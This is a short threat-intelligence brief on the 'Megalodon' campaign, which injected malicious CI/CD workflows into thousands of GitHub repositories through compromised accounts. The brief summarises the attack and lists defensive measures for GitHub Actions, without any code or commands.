Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows
Summary
A new automated campaign dubbed "Megalodon" has been discovered targeting over 5,500 GitHub repositories. The attacker used compromised accounts to inject malicious CI/CD workflows, executing bash payloads to exfiltrate sensitive information. This campaign was highly efficient, making thousands of malicious commits within a short timeframe.
IFF Assessment
The Megalodon campaign demonstrates a sophisticated and efficient method for compromising numerous code repositories, posing a significant threat to software supply chain security.
Defender Context
Defenders need to be aware of sophisticated campaigns like Megalodon that leverage CI/CD pipelines for malicious purposes. It's crucial to implement robust security measures for GitHub Actions, including strict access controls, code scanning for suspicious workflows, and monitoring for anomalous commit activity. Verifying the authenticity of author identities and build bot accounts is also a key defense strategy.